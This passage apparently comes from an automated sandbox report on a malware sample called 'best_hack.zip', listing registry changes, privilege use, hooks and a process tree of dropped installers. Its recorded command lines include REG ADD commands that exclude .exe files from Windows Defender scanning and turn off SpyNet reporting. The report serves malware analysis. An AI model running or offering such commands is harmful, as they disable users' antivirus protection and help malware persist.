| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings | C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SoundBose.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\fontview.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\fontview.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\best_hack.zip_id23904541.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\best_hack.zip_id23904541.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\best_hack.zip_id23904541.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\best_hack.zip_id23904541.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe
"C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"
C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp" /SL5="$E005E,4965743,52224,C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"
C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1616 -ip 1616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 140
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Reg Organizer 6"
C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe" ad9ff40ab2841a8973dbdb0a6dca746b
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1096
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1480
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 948
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1924
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Documents\best_hack.zip_id23904541.exe
"C:\Users\Admin\Documents\best_hack.zip_id23904541.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2172
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2228
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2252
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2240
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2252
C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe
C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe /VERYSILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 848 -p 1800 -ip 1800
C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe
C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260
C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp" /SL5="$10302,2567431,54272,C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe"
C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe
C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2332
C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe
"C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe"
C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800
C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe
C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe /S /site_id=757674
C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe
C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b
C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp" /SL5="$30336,990754,54272,C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2260
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Scan Rename"
C:\Program Files (x86)\ScanRename\ScanRename.exe
"C:\Program Files (x86)\ScanRename\ScanRename.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1332
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 1800 -ip 1800
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2084
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
